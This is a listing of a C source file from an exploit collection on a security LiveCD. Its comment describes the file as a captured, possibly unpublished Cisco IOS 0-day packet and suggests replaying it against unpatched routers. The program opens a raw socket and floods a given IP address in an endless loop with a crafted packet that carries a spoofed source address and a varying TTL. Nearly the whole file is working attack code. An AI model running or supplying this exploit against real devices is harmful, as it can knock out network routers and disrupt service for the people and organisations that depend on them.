home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / network / cisco / mine.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  79 lines
  1. /*
  2.    Possibly a Cisco IOS 0-day traffic
  3.    Captured by Michal Zalewski <lcamtuf@coredump.cx>
  4.   
  5.    Try replaying this against an unpatched Cisco router to see if
  6.    it works... this is a real-life capture.
  7.  
  8.    NOTE: I take no responsibility for the effect of using this code.
  9.    I've captured it flying over the network, it might have some effect,
  10.    might not, one way or another, it's already being used in some manner.
  11.    There *IS* a public exploit for that issue out, it's just that this
  12.    packet seems to be coming from a different, unpublished tool.
  13.    
  14.  */
  15.  
  16. #include <stdio.h>
  17. #include <stdlib.h>
  18. #include <unistd.h>
  19. #include <string.h>
  20. #include <netdb.h>
  21. #include <netinet/in.h>
  22. #include <netinet/udp.h>
  23. #include <arpa/inet.h>
  24. #include <sys/types.h>
  25. #include <sys/time.h>
  26. #include <sys/socket.h>
  27. #include <errno.h>
  28.  
  29. #define fatal(x) do { perror(x); exit(1); } while (0)
  30.  
  31. // Capture:
  32.  
  33. unsigned char data[]={
  34. 0x45,0,0,0x14,0xfd,0xb1,0,0,0,0x37,0x08,0x1b,
  35. 80,50,156,4, /* bogus source */
  36. 0,0,0,0,
  37. 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0x23,0x12,0x77,0xaf};
  38.  
  39. unsigned char sad[4];
  40. int sock,one=1,a,b,c,d;
  41. struct in_addr addr;
  42. struct sockaddr_in sain;
  43.  
  44. #define ISOK(a)    ((a) < 256 && (a)>=0)
  45.  
  46. int main(int argc, char** argv) {
  47.  
  48.   if (argc-2 || sscanf(argv[1],"%u.%u.%u.%u",&a,&b,&c,&d)!=4 ||
  49.       !(ISOK(a) && ISOK(b) && ISOK(c) && ISOK(d))) {
  50.     fprintf(stderr,"Usage: %s ip_address\n",argv[0]);
  51.     exit(1);
  52.   }
  53.   
  54.   sad[0]=a; sad[1]=b; sad[2]=c; sad[3]=d;
  55.   sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
  56.   
  57.   if (sock<0) fatal("socket");
  58.   
  59.   if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&one,sizeof(one)))
  60.     fatal("setsockopt");
  61.     
  62.   sain.sin_family = AF_INET;
  63.   memcpy(&sain.sin_addr.s_addr,sad,4);
  64.   memcpy(data+16,sad,4);
  65.   
  66.   printf("Sending");
  67.   
  68.   while (1) {
  69.     if (!(data[8]++)) { printf("."); fflush(0); }
  70.     if (sendto(sock,data,sizeof(data), 0,(struct sockaddr *)&sain,
  71.         sizeof(struct sockaddr)) < 0) perror("sendto");
  72.  
  73.   }
  74.   
  75.   return 0;
  76.   
  77. }
  78.  
  79.